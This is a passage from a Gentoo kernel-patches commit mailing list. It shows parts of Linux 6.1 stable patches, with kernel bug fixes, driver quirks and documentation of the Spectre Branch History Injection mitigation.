+-			 REQ_OP_DRV_OUT : REQ_OP_DRV_IN) | _flags,	\
+-			 _buffer, _bufflen, _timeout, _retries,	\
+-			 &(struct scsi_exec_args) {			\
+-				.sense = _sense,			\
+-				.sshdr = _sshdr,			\
+-				.req_flags = _rq_flags & RQF_PM  ?	\
+-						BLK_MQ_REQ_PM : 0,	\
+-				.resid = _resid,			\
+-			 });						\
++	BUILD_BUG_ON((sense) != NULL &&					\
++		     sizeof(sense) != SCSI_SENSE_BUFFERSIZE);		\
++	__scsi_execute(sdev, cmd, data_direction, buffer, bufflen,	\
++		       sense, sshdr, timeout, retries, flags, rq_flags,	\
++		       resid);						\
+ })
+-
+ static inline int scsi_execute_req(struct scsi_device *sdev,
+ 	const unsigned char *cmd, int data_direction, void *buffer,
+ 	unsigned bufflen, struct scsi_sense_hdr *sshdr, int timeout,
+ 	int retries, int *resid)
+ {
+-	return scsi_execute_cmd(sdev, cmd,
+-				data_direction == DMA_TO_DEVICE ?
+-				REQ_OP_DRV_OUT : REQ_OP_DRV_IN, buffer,
+-				bufflen, timeout, retries,
+-				&(struct scsi_exec_args) {
+-					.sshdr = sshdr,
+-					.resid = resid,
+-				});
++	return scsi_execute(sdev, cmd, data_direction, buffer,
++		bufflen, NULL, sshdr, timeout, retries,  0, 0, resid);
+ }
+ extern void sdev_disable_disk_events(struct scsi_device *sdev);
+ extern void sdev_enable_disk_events(struct scsi_device *sdev);
+diff --git a/include/uapi/linux/input-event-codes.h b/include/uapi/linux/input-event-codes.h
+index 7ad931a329706..1ce8a91349e9f 100644
+--- a/include/uapi/linux/input-event-codes.h
++++ b/include/uapi/linux/input-event-codes.h
+@@ -602,6 +602,7 @@
+ 
+ #define KEY_ALS_TOGGLE		0x230	/* Ambient light sensor */
+ #define KEY_ROTATE_LOCK_TOGGLE	0x231	/* Display rotation lock */
++#define KEY_REFRESH_RATE_TOGGLE	0x232	/* Display refresh rate toggle */
+ 
+ #define KEY_BUTTONCONFIG		0x240	/* AL Button Configuration */
+ #define KEY_TASKMANAGER		0x241	/* AL Task/Project Manager */
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 415248c1f82c6..68f1b6f8699a6 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1978,6 +1978,13 @@ static void io_init_req_drain(struct io_kiocb *req)
+ 	}
+ }
+ 
++static __cold int io_init_fail_req(struct io_kiocb *req, int err)
++{
++	/* ensure per-opcode data is cleared if we fail before prep */
++	memset(&req->cmd.data, 0, sizeof(req->cmd.data));
++	return err;
++}
++
+ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 		       const struct io_uring_sqe *sqe)
+ 	__must_hold(&ctx->uring_lock)
+@@ -1998,29 +2005,29 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 
+ 	if (unlikely(opcode >= IORING_OP_LAST)) {
+ 		req->opcode = 0;
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 	}
+ 	def = &io_op_defs[opcode];
+ 	if (unlikely(sqe_flags & ~SQE_COMMON_FLAGS)) {
+ 		/* enforce forwards compatibility on users */
+ 		if (sqe_flags & ~SQE_VALID_FLAGS)
+-			return -EINVAL;
++			return io_init_fail_req(req, -EINVAL);
+ 		if (sqe_flags & IOSQE_BUFFER_SELECT) {
+ 			if (!def->buffer_select)
+-				return -EOPNOTSUPP;
++				return io_init_fail_req(req, -EOPNOTSUPP);
+ 			req->buf_index = READ_ONCE(sqe->buf_group);
+ 		}
+ 		if (sqe_flags & IOSQE_CQE_SKIP_SUCCESS)
+ 			ctx->drain_disabled = true;
+ 		if (sqe_flags & IOSQE_IO_DRAIN) {
+ 			if (ctx->drain_disabled)
+-				return -EOPNOTSUPP;
++				return io_init_fail_req(req, -EOPNOTSUPP);
+ 			io_init_req_drain(req);
+ 		}
+ 	}
+ 	if (unlikely(ctx->restricted || ctx->drain_active || ctx->drain_next)) {
+ 		if (ctx->restricted && !io_check_restriction(ctx, req, sqe_flags))
+-			return -EACCES;
++			return io_init_fail_req(req, -EACCES);
+ 		/* knock it to the slow queue path, will be drained there */
+ 		if (ctx->drain_active)
+ 			req->flags |= REQ_F_FORCE_ASYNC;
+@@ -2033,9 +2040,9 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 	}
+ 
+ 	if (!def->ioprio && sqe->ioprio)
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 	if (!def->iopoll && (ctx->flags & IORING_SETUP_IOPOLL))
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 
+ 	if (def->needs_file) {
+ 		struct io_submit_state *state = &ctx->submit_state;
+@@ -2059,12 +2066,12 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 
+ 		req->creds = xa_load(&ctx->personalities, personality);
+ 		if (!req->creds)
+-			return -EINVAL;
++			return io_init_fail_req(req, -EINVAL);
+ 		get_cred(req->creds);
+ 		ret = security_uring_override_creds(req->creds);
+ 		if (ret) {
+ 			put_cred(req->creds);
+-			return ret;
++			return io_init_fail_req(req, ret);
+ 		}
+ 		req->flags |= REQ_F_CREDS;
+ 	}
+diff --git a/kernel/dma/direct.c b/kernel/dma/direct.c
+index 63859a101ed83..d4215739efc71 100644
+--- a/kernel/dma/direct.c
++++ b/kernel/dma/direct.c
+@@ -296,7 +296,7 @@ void *dma_direct_alloc(struct device *dev, size_t size,
+ 	} else {
+ 		ret = page_address(page);
+ 		if (dma_set_decrypted(dev, ret, size))
+-			goto out_free_pages;
++			goto out_leak_pages;
+ 	}
+ 
+ 	memset(ret, 0, size);
+@@ -317,6 +317,8 @@ void *dma_direct_alloc(struct device *dev, size_t size,
+ out_free_pages:
+ 	__dma_direct_free_pages(dev, page, size);
+ 	return NULL;
++out_leak_pages:
++	return NULL;
+ }
+ 
+ void dma_direct_free(struct device *dev, size_t size,
+@@ -379,12 +381,11 @@ struct page *dma_direct_alloc_pages(struct device *dev, size_t size,
+ 
+ 	ret = page_address(page);
+ 	if (dma_set_decrypted(dev, ret, size))
+-		goto out_free_pages;
++		goto out_leak_pages;
+ 	memset(ret, 0, size);
+ 	*dma_handle = phys_to_dma_direct(dev, page_to_phys(page));
+ 	return page;
+-out_free_pages:
+-	__dma_direct_free_pages(dev, page, size);
++out_leak_pages:
+ 	return NULL;
+ }
+ 
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 63e94f3bd8dcd..e6c2bf04a32c0 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -441,6 +441,14 @@ void panic(const char *fmt, ...)
+ 
+ 	/* Do not scroll important messages printed above */
+ 	suppress_printk = 1;
++
++	/*
++	 * The final messages may not have been printed if in a context that
++	 * defers printing (such as NMI) and irq_work is not available.
++	 * Explicitly flush the kernel log buffer one last time.
++	 */
++	console_flush_on_panic(CONSOLE_FLUSH_PENDING);
++
+ 	local_irq_enable();
+ 	for (i = 0; ; i += PANIC_TIMER_STEP) {
+ 		touch_softlockup_watchdog();
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 431a922e5c89e..d2947de3021a9 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -4431,7 +4431,7 @@ int ring_buffer_iter_empty(struct ring_buffer_iter *iter)
+ 	cpu_buffer = iter->cpu_buffer;
+ 	reader = cpu_buffer->reader_page;
+ 	head_page = cpu_buffer->head_page;
+-	commit_page = cpu_buffer->commit_page;
++	commit_page = READ_ONCE(cpu_buffer->commit_page);
+ 	commit_ts = commit_page->page->time_stamp;
+ 
+ 	/*
+diff --git a/net/mpls/mpls_gso.c b/net/mpls/mpls_gso.c
+index 1482259de9b5d..40334d4d89dea 100644
+--- a/net/mpls/mpls_gso.c
++++ b/net/mpls/mpls_gso.c
+@@ -26,6 +26,9 @@ static struct sk_buff *mpls_gso_segment(struct sk_buff *skb,
+ 	__be16 mpls_protocol;
+ 	unsigned int mpls_hlen;
+ 
++	if (!skb_inner_network_header_was_set(skb))
++		goto out;
++
+ 	skb_reset_network_header(skb);
+ 	mpls_hlen = skb_inner_network_header(skb) - skb_network_header(skb);
+ 	if (unlikely(!mpls_hlen || mpls_hlen % MPLS_HLEN))
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8d38cd5047692..8152a69d82681 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1192,6 +1192,24 @@ static void nf_tables_table_disable(struct net *net, struct nft_table *table)
+ #define __NFT_TABLE_F_UPDATE		(__NFT_TABLE_F_WAS_DORMANT | \
+ 					 __NFT_TABLE_F_WAS_AWAKEN)
+ 
++static bool nft_table_pending_update(const struct nft_ctx *ctx)
++{
++	struct nftables_pernet *nft_net = nft_pernet(ctx->net);
++	struct nft_trans *trans;
++
++	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++		return true;
++
++	list_for_each_entry(trans, &nft_net->commit_list, list) {
++		if (trans->ctx.table == ctx->table &&
++		    trans->msg_type == NFT_MSG_DELCHAIN &&
++		    nft_is_base_chain(trans->ctx.chain))
++			return true;
++	}
++
++	return false;
++}
++
+ static int nf_tables_updtable(struct nft_ctx *ctx)
+ {
+ 	struct nft_trans *trans;
+@@ -1215,7 +1233,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 		return -EOPNOTSUPP;
+ 
+ 	/* No dormant off/on/off/on games in single transaction */
+-	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++	if (nft_table_pending_update(ctx))
+ 		return -EINVAL;
+ 
+ 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
+@@ -9902,10 +9920,11 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	struct nft_trans *trans, *next;
+ 	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
++	int err = 0;
+ 
+ 	if (action == NFNL_ABORT_VALIDATE &&
+ 	    nf_tables_validate(net) < 0)
+-		return -EAGAIN;
++		err = -EAGAIN;
+ 
+ 	list_for_each_entry_safe_reverse(trans, next, &nft_net->commit_list,
+ 					 list) {
+@@ -10076,12 +10095,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		nf_tables_abort_release(trans);
+ 	}
+ 
+-	if (action == NFNL_ABORT_AUTOLOAD)
+-		nf_tables_module_autoload(net);
+-	else
+-		nf_tables_module_autoload_cleanup(net);
+-
+-	return 0;
++	return err;
+ }
+ 
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+@@ -10095,6 +10109,16 @@ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 	ret = __nf_tables_abort(net, action);
+ 	nft_gc_seq_end(nft_net, gc_seq);
+ 
++	WARN_ON_ONCE(!list_empty(&nft_net->commit_list));
++
++	/* module autoload needs to happen after GC sequence update because it
++	 * temporarily releases and grabs mutex again.
++	 */
++	if (action == NFNL_ABORT_AUTOLOAD)
++		nf_tables_module_autoload(net);
++	else
++		nf_tables_module_autoload_cleanup(net);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+ 	return ret;
+@@ -10892,9 +10916,10 @@ static void __net_exit nf_tables_exit_net(struct net *net)
+ 
+ 	gc_seq = nft_gc_seq_begin(nft_net);
+ 
+-	if (!list_empty(&nft_net->commit_list) ||
+-	    !list_empty(&nft_net->module_list))
+-		__nf_tables_abort(net, NFNL_ABORT_NONE);
++	WARN_ON_ONCE(!list_empty(&nft_net->commit_list));
++
++	if (!list_empty(&nft_net->module_list))
++		nf_tables_module_autoload_cleanup(net);
+ 
+ 	__nft_release_tables(net);
+ 
+diff --git a/net/smc/smc_pnet.c b/net/smc/smc_pnet.c
+index 25fb2fd186e22..21b8bf23e4ee6 100644
+--- a/net/smc/smc_pnet.c
++++ b/net/smc/smc_pnet.c
+@@ -802,6 +802,16 @@ static void smc_pnet_create_pnetids_list(struct net *net)
+ 	u8 ndev_pnetid[SMC_MAX_PNETID_LEN];
+ 	struct net_device *dev;
+ 
++	/* Newly created netns do not have devices.
++	 * Do not even acquire rtnl.
++	 */
++	if (list_empty(&net->dev_base_head))
++		return;
++
++	/* Note: This might not be needed, because smc_pnet_netdev_event()
++	 * is also calling smc_pnet_add_base_pnetid() when handling
++	 * NETDEV_UP event.
++	 */
+ 	rtnl_lock();
+ 	for_each_netdev(net, dev)
+ 		smc_pnet_add_base_pnetid(net, dev, ndev_pnetid);
+diff --git a/scripts/gcc-plugins/stackleak_plugin.c b/scripts/gcc-plugins/stackleak_plugin.c
+index c5c2ce113c923..d20c47d21ad83 100644
+--- a/scripts/gcc-plugins/stackleak_plugin.c
++++ b/scripts/gcc-plugins/stackleak_plugin.c
+@@ -467,6 +467,8 @@ static bool stackleak_gate(void)
+ 			return false;
+ 		if (STRING_EQUAL(section, ".entry.text"))
+ 			return false;
++		if (STRING_EQUAL(section, ".head.text"))
++			return false;
+ 	}
+ 
+ 	return track_frame_size >= 0;
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index f8b644cb9157a..8753125683692 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -771,10 +771,14 @@ static int check_cip_header(struct amdtp_stream *s, const __be32 *buf,
+ 	} else {
+ 		unsigned int dbc_interval;
+ 
+-		if (*data_blocks > 0 && s->ctx_data.tx.dbc_interval > 0)
+-			dbc_interval = s->ctx_data.tx.dbc_interval;
+-		else
+-			dbc_interval = *data_blocks;
++		if (!(s->flags & CIP_DBC_IS_PAYLOAD_QUADLETS)) {
++			if (*data_blocks > 0 && s->ctx_data.tx.dbc_interval > 0)
++				dbc_interval = s->ctx_data.tx.dbc_interval;
++			else
++				dbc_interval = *data_blocks;
++		} else {
++			dbc_interval = payload_length / sizeof(__be32);
++		}
+ 
+ 		lost = dbc != ((*data_block_counter + dbc_interval) & 0xff);
+ 	}
+diff --git a/sound/firewire/amdtp-stream.h b/sound/firewire/amdtp-stream.h
+index 1f957c946c956..cf9ab347277f2 100644
+--- a/sound/firewire/amdtp-stream.h
++++ b/sound/firewire/amdtp-stream.h
+@@ -37,6 +37,9 @@
+  *	the value of current SYT_INTERVAL; e.g. initial value is not zero.
+  * @CIP_UNAWARE_SYT: For outgoing packet, the value in SYT field of CIP is 0xffff.
+  *	For incoming packet, the value in SYT field of CIP is not handled.
++ * @CIP_DBC_IS_PAYLOAD_QUADLETS: Available for incoming packet, and only effective with
++ *	CIP_DBC_IS_END_EVENT flag. The value of dbc field is the number of accumulated quadlets
++ *	in CIP payload, instead of the number of accumulated data blocks.
+  */
+ enum cip_flags {
+ 	CIP_NONBLOCKING		= 0x00,
+@@ -51,6 +54,7 @@ enum cip_flags {
+ 	CIP_NO_HEADER		= 0x100,
+ 	CIP_UNALIGHED_DBC	= 0x200,
+ 	CIP_UNAWARE_SYT		= 0x400,
++	CIP_DBC_IS_PAYLOAD_QUADLETS = 0x800,
+ };
+ 
+ /**
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 985012f2003e2..d1e6e4208c376 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -224,6 +224,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD2_100K),
+ 	},
++	{
++		/* NUC15 LAPRC710 skews */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPRC710"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/soc-core.c b/sound/soc/soc-core.c
+index a409fbed8f34c..6a4101dc15a54 100644
+--- a/sound/soc/soc-core.c
++++ b/sound/soc/soc-core.c
+@@ -1020,6 +1020,9 @@ int snd_soc_add_pcm_runtime(struct snd_soc_card *card,
+ 			if (!snd_soc_is_matching_component(platform, component))
+ 				continue;
+ 
++			if (snd_soc_component_is_dummy(component) && component->num_dai)
++				continue;
++
+ 			snd_soc_rtd_add_component(rtd, component);
+ 		}
+ 	}
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 6a00a6eecaef0..c5c5082cb24e5 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -376,7 +376,7 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 		goto error_close_dir;
+ 	}
+ 
+-	seekdir(dp, 0);
++	rewinddir(dp);
+ 	while (ent = readdir(dp), ent) {
+ 		if (strcmp(ent->d_name + strlen(ent->d_name) - strlen("_en"),
+ 			   "_en") == 0) {
+diff --git a/tools/lib/perf/evlist.c b/tools/lib/perf/evlist.c
+index 61b637f29b827..b871923c7e5cd 100644
+--- a/tools/lib/perf/evlist.c
++++ b/tools/lib/perf/evlist.c
+@@ -233,10 +233,10 @@ u64 perf_evlist__read_format(struct perf_evlist *evlist)
+ 
+ static void perf_evlist__id_hash(struct perf_evlist *evlist,
+ 				 struct perf_evsel *evsel,
+-				 int cpu, int thread, u64 id)
++				 int cpu_map_idx, int thread, u64 id)
+ {
+ 	int hash;
+-	struct perf_sample_id *sid = SID(evsel, cpu, thread);
++	struct perf_sample_id *sid = SID(evsel, cpu_map_idx, thread);
+ 
+ 	sid->id = id;
+ 	sid->evsel = evsel;
+@@ -254,21 +254,27 @@ void perf_evlist__reset_id_hash(struct perf_evlist *evlist)
+ 
+ void perf_evlist__id_add(struct perf_evlist *evlist,
+ 			 struct perf_evsel *evsel,
+-			 int cpu, int thread, u64 id)
++			 int cpu_map_idx, int thread, u64 id)
+ {
+-	perf_evlist__id_hash(evlist, evsel, cpu, thread, id);
++	if (!SID(evsel, cpu_map_idx, thread))
++		return;
++
++	perf_evlist__id_hash(evlist, evsel, cpu_map_idx, thread, id);
+ 	evsel->id[evsel->ids++] = id;
+ }
+ 
+ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 			   struct perf_evsel *evsel,
+-			   int cpu, int thread, int fd)
++			   int cpu_map_idx, int thread, int fd)
+ {
+ 	u64 read_data[4] = { 0, };
+ 	int id_idx = 1; /* The first entry is the counter value */
+ 	u64 id;
+ 	int ret;
+ 
++	if (!SID(evsel, cpu_map_idx, thread))
++		return -1;
++
+ 	ret = ioctl(fd, PERF_EVENT_IOC_ID, &id);
+ 	if (!ret)
+ 		goto add;
+@@ -297,7 +303,7 @@ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 	id = read_data[id_idx];
+ 
+ add:
+-	perf_evlist__id_add(evlist, evsel, cpu, thread, id);
++	perf_evlist__id_add(evlist, evsel, cpu_map_idx, thread, id);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/perf/include/internal/evlist.h b/tools/lib/perf/include/internal/evlist.h
+index 850f07070036c..cf77db75291b9 100644
+--- a/tools/lib/perf/include/internal/evlist.h
++++ b/tools/lib/perf/include/internal/evlist.h
+@@ -127,11 +127,11 @@ u64 perf_evlist__read_format(struct perf_evlist *evlist);
+ 
+ void perf_evlist__id_add(struct perf_evlist *evlist,
+ 			 struct perf_evsel *evsel,
+-			 int cpu, int thread, u64 id);
++			 int cpu_map_idx, int thread, u64 id);
+ 
+ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 			   struct perf_evsel *evsel,
+-			   int cpu, int thread, int fd);
++			   int cpu_map_idx, int thread, int fd);
+ 
+ void perf_evlist__reset_id_hash(struct perf_evlist *evlist);
+ 
+diff --git a/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c b/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
+index 5fd9e594079cf..ebda9c366b2ba 100644
+--- a/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
++++ b/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
+@@ -1241,6 +1241,7 @@ unsigned int get_pkg_num(int cpu)
+ 	retval = fscanf(fp, "%d\n", &pkg);
+ 	if (retval != 1)
+ 		errx(1, "%s: failed to parse", pathname);
++	fclose(fp);
+ 	return pkg;
+ }
+ 
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index e6c381498e632..449e45bd69665 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -836,6 +836,7 @@ sub set_value {
+     if ($lvalue =~ /^(TEST|BISECT|CONFIG_BISECT)_TYPE(\[.*\])?$/ &&
+ 	$prvalue !~ /^(config_|)bisect$/ &&
+ 	$prvalue !~ /^build$/ &&
++	$prvalue !~ /^make_warnings_file$/ &&
+ 	$buildonly) {
+ 
+ 	# Note if a test is something other than build, then we


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-10 15:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-10 15:10 UTC (permalink / raw
  To: gentoo-commits

commit:     49ba92d62375919c01f82e22cc6536ec6f37375c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 10 15:10:08 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 10 15:10:08 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=49ba92d6

Linux patch 6.1.85

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1084_linux-6.1.85.patch | 6161 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6165 insertions(+)

diff --git a/0000_README b/0000_README
index 55224b04..beb8ee68 100644
--- a/0000_README
+++ b/0000_README
@@ -379,6 +379,10 @@ Patch:  1083_linux-6.1.84.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.84
 
+Patch:  1084_linux-6.1.85.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.85
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1084_linux-6.1.85.patch b/1084_linux-6.1.85.patch
new file mode 100644
index 00000000..e0ba4a2c
--- /dev/null
+++ b/1084_linux-6.1.85.patch
@@ -0,0 +1,6161 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index 32a8893e56177..9edb2860a3e19 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -138,11 +138,10 @@ associated with the source address of the indirect branch. Specifically,
+ the BHB might be shared across privilege levels even in the presence of
+ Enhanced IBRS.
+ 
+-Currently the only known real-world BHB attack vector is via
+-unprivileged eBPF. Therefore, it's highly recommended to not enable
+-unprivileged eBPF, especially when eIBRS is used (without retpolines).
+-For a full mitigation against BHB attacks, it's recommended to use
+-retpolines (or eIBRS combined with retpolines).
++Previously the only known real-world BHB attack vector was via unprivileged
++eBPF. Further research has found attacks that don't require unprivileged eBPF.
++For a full mitigation against BHB attacks it is recommended to set BHI_DIS_S or
++use the BHB clearing sequence.
+ 
+ Attack scenarios
+ ----------------
+@@ -430,6 +429,23 @@ The possible values in this file are:
+   'PBRSB-eIBRS: Not affected'  CPU is not affected by PBRSB
+   ===========================  =======================================================
+ 
++  - Branch History Injection (BHI) protection status:
++
++.. list-table::
++
++ * - BHI: Not affected
++   - System is not affected
++ * - BHI: Retpoline
++   - System is protected by retpoline
++ * - BHI: BHI_DIS_S
++   - System is protected by BHI_DIS_S
++ * - BHI: SW loop; KVM SW loop
++   - System is protected by software clearing sequence
++ * - BHI: Syscall hardening
++   - Syscalls are hardened against BHI
++ * - BHI: Syscall hardening; KVM: SW loop
++   - System is protected from userspace attacks by syscall hardening; KVM is protected by software clearing sequence
++
+ Full mitigation might require a microcode update from the CPU
+ vendor. When the necessary microcode is not available, the kernel will
+ report vulnerability.
+@@ -484,7 +500,11 @@ Spectre variant 2
+ 
+    Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
+    boot, by setting the IBRS bit, and they're automatically protected against
+-   Spectre v2 variant attacks.
++   some Spectre v2 variant attacks. The BHB can still influence the choice of
++   indirect branch predictor entry, and although branch predictor entries are
++   isolated between modes when eIBRS is enabled, the BHB itself is not isolated
++   between modes. Systems which support BHI_DIS_S will set it to protect against
++   BHI attacks.
+ 
+    On Intel's enhanced IBRS systems, this includes cross-thread branch target
+    injections on SMT systems (STIBP). In other words, Intel eIBRS enables
+@@ -638,6 +658,22 @@ kernel command line.
+ 		spectre_v2=off. Spectre variant 1 mitigations
+ 		cannot be disabled.
+ 
++	spectre_bhi=
++
++		[X86] Control mitigation of Branch History Injection
++		(BHI) vulnerability. Syscalls are hardened against BHI
++		regardless of this setting. This setting affects the deployment
++		of the HW BHI control and the SW BHB clearing sequence.
++
++		on
++			unconditionally enable.
++		off
++			unconditionally disable.
++		auto
++			enable if hardware mitigation
++			control(BHI_DIS_S) is available, otherwise
++			enable alternate mitigation in KVM.
++
+ For spectre_v2_user see Documentation/admin-guide/kernel-parameters.txt
+ 
+ Mitigation selection guide
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 88dffaf8f0a99..b2c7b2f012e90 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5733,6 +5733,18 @@
+ 	sonypi.*=	[HW] Sony Programmable I/O Control Device driver
+ 			See Documentation/admin-guide/laptops/sonypi.rst
+ 
++	spectre_bhi=	[X86] Control mitigation of Branch History Injection
++			(BHI) vulnerability. Syscalls are hardened against BHI
++			reglardless of this setting. This setting affects the
++			deployment of the HW BHI control and the SW BHB
++			clearing sequence.
++
++			on   - unconditionally enable.
++			off  - unconditionally disable.
++			auto - (default) enable hardware mitigation
++			       (BHI_DIS_S) if available, otherwise enable
++			       alternate mitigation in KVM.
++
+ 	spectre_v2=	[X86] Control mitigation of Spectre variant 2
+ 			(indirect branch speculation) vulnerability.
+ 			The default operation protects the kernel from
+diff --git a/Makefile b/Makefile
+index 0e33150db2bfc..5dff9ff999981 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 84
++SUBLEVEL = 85
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
+index eae22e6e97c15..f55ce6f2fdc28 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor.dtsi
+@@ -923,6 +923,8 @@ bluetooth: bluetooth {
+ 		vddrf-supply = <&pp1300_l2c>;
+ 		vddch0-supply = <&pp3300_l10c>;
+ 		max-speed = <3200000>;
++
++		qcom,local-bd-address-broken;
+ 	};
+ };
+ 
+diff --git a/arch/riscv/include/asm/uaccess.h b/arch/riscv/include/asm/uaccess.h
+index ec0cab9fbddd0..72ec1d9bd3f31 100644
+--- a/arch/riscv/include/asm/uaccess.h
++++ b/arch/riscv/include/asm/uaccess.h
+@@ -319,7 +319,7 @@ unsigned long __must_check clear_user(void __user *to, unsigned long n)
+ 
+ #define __get_kernel_nofault(dst, src, type, err_label)			\
+ do {									\
+-	long __kr_err;							\
++	long __kr_err = 0;						\
+ 									\
+ 	__get_user_nocheck(*((type *)(dst)), (type *)(src), __kr_err);	\
+ 	if (unlikely(__kr_err))						\
+@@ -328,7 +328,7 @@ do {									\
+ 
+ #define __put_kernel_nofault(dst, src, type, err_label)			\
+ do {									\
+-	long __kr_err;							\
++	long __kr_err = 0;						\
+ 									\
+ 	__put_user_nocheck(*((type *)(src)), (type *)(dst), __kr_err);	\
+ 	if (unlikely(__kr_err))						\
+diff --git a/arch/riscv/kernel/process.c b/arch/riscv/kernel/process.c
+index 8955f2432c2d8..6906cc0e57875 100644
+--- a/arch/riscv/kernel/process.c
++++ b/arch/riscv/kernel/process.c
+@@ -25,8 +25,6 @@
+ #include <asm/thread_info.h>
+ #include <asm/cpuidle.h>
+ 
+-register unsigned long gp_in_global __asm__("gp");
+-
+ #if defined(CONFIG_STACKPROTECTOR) && !defined(CONFIG_STACKPROTECTOR_PER_TASK)
+ #include <linux/stackprotector.h>
+ unsigned long __stack_chk_guard __read_mostly;
+@@ -170,7 +168,6 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	if (unlikely(args->fn)) {
+ 		/* Kernel thread */
+ 		memset(childregs, 0, sizeof(struct pt_regs));
+-		childregs->gp = gp_in_global;
+ 		/* Supervisor/Machine, irqs on: */
+ 		childregs->status = SR_PP | SR_PIE;
+ 
+diff --git a/arch/s390/kernel/entry.S b/arch/s390/kernel/entry.S
+index d2a1f2f4f5b88..c9799dec92793 100644
+--- a/arch/s390/kernel/entry.S
++++ b/arch/s390/kernel/entry.S
+@@ -699,6 +699,7 @@ ENDPROC(stack_overflow)
+ .Lthis_cpu:	.short	0
+ .Lstosm_tmp:	.byte	0
+ 	.section .rodata, "a"
++	.balign	8
